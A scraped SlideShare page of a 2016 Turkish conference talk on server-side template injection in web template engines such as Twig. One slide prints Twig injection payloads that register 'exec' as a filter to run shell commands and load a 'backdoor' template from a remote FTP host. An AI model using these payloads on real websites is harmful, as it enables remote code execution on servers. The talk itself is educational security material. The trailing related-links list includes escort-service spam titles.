SlideShare una empresa de Scribd logo

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Ömer Çıtak
Ömer Çıtak

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Ingeniería
1 de 24
Descargar para leer sin conexión
Web Çatı Şablonlarının Güvenliği (SSTI) Ömer Çıtak Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr www.omercitak.com
whoami Security Researcher @ Netsparker Ltd. Developer @ Geri kalan zamanlarda Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
quesitions 1. Asp.net or PHP?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
why using framework?
why using framework? ● Spaghetti Code (functions.php) :P
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time
why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time ● MVC or other models
why using framework?
what is the MVC?
what is the MVC?
what is the MVC?
what is the VIEW layer?
what is the VIEW layer? Template Engines; ● Twig ● Smarty ● Blade ● Volt ● Mustache ● etc...
twig ● registerUndefinedFilterCallback(“function_name”) ● getFilter(“filter”) ● setCache(“ftp://omercitak.com:21”) ● loadTemplate(“backdoor”)
exploit ● {{_self.env.registerUndefinedFilterCallback(“exec”)}} ● {{_self.env.getFilter(“ls”)}} ● {{_self.env.setCache(“ftp://omercitak.com:21”)}} ● {{_self.env.loadTemplate(“backdoor”)}}
demo
questions
thanks www.omercitak.com All Social Platform: @Om3rCitak

Recomendados

Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Ömer Çıtak
 
Laravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaLaravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaÖmer Çıtak
 
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakOWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakNetsparker Türkiye
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Paul Gower
 
From Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hFrom Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hXavier Damman
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
NIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsOddvar Moe
 

Recomendados

Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Ömer Çıtak
 
Laravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaLaravel ile hızlı ve modern web programlama
Laravel ile hızlı ve modern web programlamaÖmer Çıtak
 
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakOWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer Çıtak
OWTG 2016, Web Çatı Şablonlarının Güvenliği (SSTI), Ömer ÇıtakNetsparker Türkiye
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Code Review: How and When - Tulsa TechFest 2016
Code Review: How and When - Tulsa TechFest 2016Paul Gower
 
From Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hFrom Twitter App idea to Mashable.com in 24h
From Twitter App idea to Mashable.com in 24hXavier Damman
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014Anant Shrivastava
 
NIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsOddvar Moe
 
Web Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiWeb Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiÖmer Çıtak
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Ömer Çıtak
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Ömer Çıtak
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıAhmet Gürel
 
AngularJS sunumu
AngularJS sunumuAngularJS sunumu
AngularJS sunumuokanozeren
 
Linux101
Linux101Linux101
Linux101Büşra Yenidoğan
 
How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.İbrahim UÇAR
 
Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişUmut Ergin
 
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisWeb for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisUmut Ergin
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploitmsoner
 
Bga some-2016
Bga some-2016Bga some-2016
Bga some-2016MEB Adalar Halk Eğitim Merkezi
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesFatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP Fatih Ozavci
 
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Öncü Furkan
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 
Nmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıNmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıBGA Cyber Security
 
Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakLaravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakNetsparker Türkiye
 
AI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfAI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfsivaganeshsivakumar1
 

Más contenido relacionado

Destacado

Web Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiWeb Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiÖmer Çıtak
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Ömer Çıtak
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Ömer Çıtak
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıAhmet Gürel
 
AngularJS sunumu
AngularJS sunumuAngularJS sunumu
AngularJS sunumuokanozeren
 
How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.İbrahim UÇAR
 
Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişUmut Ergin
 
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisWeb for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisUmut Ergin
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploitmsoner
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesFatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP Fatih Ozavci
 
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Öncü Furkan
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 

Destacado (20)

Web Uygulamalarının Hacklenmesi
Web Uygulamalarının HacklenmesiWeb Uygulamalarının Hacklenmesi
Web Uygulamalarının Hacklenmesi
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş Dökümanı
 
AngularJS sunumu
AngularJS sunumuAngularJS sunumu
AngularJS sunumu
 
Linux101
Linux101Linux101
Linux101
 
How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.How to Build Package in Linux Based Systems.
How to Build Package in Linux Based Systems.
 
Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine Giriş
 
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine GirisWeb for Pentester 2 ile Web Uygulama Güvenligine Giris
Web for Pentester 2 ile Web Uygulama Güvenligine Giris
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploit
 
Bga some-2016
Bga some-2016Bga some-2016
Bga some-2016
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco Phones
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP
 
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 Workshop
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration Testing
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
 
Nmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıNmap Kullanım Kitapçığı
Nmap Kullanım Kitapçığı
 

Similar a Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakLaravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakNetsparker Türkiye
 
AI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfAI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfsivaganeshsivakumar1
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open StandardsAPIsecure_ Official
 
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...apidays
 
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...Katarzyna Javaheri-Szpak
 
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...Ioannis Stais
 
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, StoplightINTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplightapidays
 
How to Use OWASP Security Logging
How to Use OWASP Security LoggingHow to Use OWASP Security Logging
How to Use OWASP Security LoggingMilton Smith
 
Unleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDTUnleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDTNaresh Jain
 
openQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering FrameworkopenQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering FrameworkEdgard Marx
 
Security as Code: A DevSecOps Approach
Security as Code: A DevSecOps ApproachSecurity as Code: A DevSecOps Approach
Security as Code: A DevSecOps ApproachVMware Tanzu
 
Introduction to Python for new beginner
Introduction to Python for new beginnerIntroduction to Python for new beginner
Introduction to Python for new beginnerBurasakorn Sabyeying
 
Developing Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & PythonDeveloping Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & PythonSmartBear
 

Similar a Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016 (20)

Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer ÇıtakLaravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
Laravel ile Hızlı ve Modern Web Programlama, Ömer Çıtak
 
AI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdfAI assisted testing using postman and openAI.pdf
AI assisted testing using postman and openAI.pdf
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
 
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
apidays New York 2023 - API First Paradigms That Help Secure Your APIs, Raj U...
 
2 . web app s canners
2 . web app s canners2 . web app s canners
2 . web app s canners
 
OISF - AppSec Presentation
OISF - AppSec PresentationOISF - AppSec Presentation
OISF - AppSec Presentation
 
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
WDI 2021 - Pierwszy duży projekt w Pythonie i Selenium - Katarzyna Javaheri-S...
 
Developer < eat love code >
Developer < eat love code >Developer < eat love code >
Developer < eat love code >
 
How to be a Developer
How to be a DeveloperHow to be a Developer
How to be a Developer
 
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AU...
 
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, StoplightINTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
INTERFACE by apidays 2023 - API Design Governance, Nauman Ali, Stoplight
 
How to Use OWASP Security Logging
How to Use OWASP Security LoggingHow to Use OWASP Security Logging
How to Use OWASP Security Logging
 
Unleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDTUnleashing the Power of Automated Refactoring with JDT
Unleashing the Power of Automated Refactoring with JDT
 
openQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering FrameworkopenQA Hoverboard - Open-source Question Answering Framework
openQA Hoverboard - Open-source Question Answering Framework
 
Clojure at ardoq
Clojure at ardoqClojure at ardoq
Clojure at ardoq
 
Security as Code: A DevSecOps Approach
Security as Code: A DevSecOps ApproachSecurity as Code: A DevSecOps Approach
Security as Code: A DevSecOps Approach
 
Introduction to Python for new beginner
Introduction to Python for new beginnerIntroduction to Python for new beginner
Introduction to Python for new beginner
 
Developing Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & PythonDeveloping Brilliant and Powerful APIs in Ruby & Python
Developing Brilliant and Powerful APIs in Ruby & Python
 
ISC2: AppSec & OWASP Primer
ISC2: AppSec & OWASP PrimerISC2: AppSec & OWASP Primer
ISC2: AppSec & OWASP Primer
 

Más de Ömer Çıtak

Cyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad SectorsCyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad SectorsÖmer Çıtak
 
Günahı ile Sevabı ile Laravel
Günahı ile Sevabı ile LaravelGünahı ile Sevabı ile Laravel
Günahı ile Sevabı ile LaravelÖmer Çıtak
 
Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Ömer Çıtak
 
Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?Ömer Çıtak
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Ömer Çıtak
 
How to Make Web RTS Game?
How to Make Web RTS Game?How to Make Web RTS Game?
How to Make Web RTS Game?Ömer Çıtak
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Ömer Çıtak
 

Más de Ömer Çıtak (8)

osquery injection
osquery injectionosquery injection
osquery injection
 
Cyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad SectorsCyber Security's Good Sectors & Bad Sectors
Cyber Security's Good Sectors & Bad Sectors
 
Günahı ile Sevabı ile Laravel
Günahı ile Sevabı ile LaravelGünahı ile Sevabı ile Laravel
Günahı ile Sevabı ile Laravel
 
Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)
 
Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?Data manipulation Will hackers rule the world?
Data manipulation Will hackers rule the world?
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)
 
How to Make Web RTS Game?
How to Make Web RTS Game?How to Make Web RTS Game?
How to Make Web RTS Game?
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)
 

Último

Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Christo Ananth
 
Introduction to IEEE STANDARDS and its different types.pptx
Introduction to IEEE STANDARDS and its different types.pptxIntroduction to IEEE STANDARDS and its different types.pptx
Introduction to IEEE STANDARDS and its different types.pptxupamatechverse
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordAsst.prof M.Gokilavani
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxAsutosh Ranjan
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINESIVASHANKAR N
 
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur EscortsRussian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
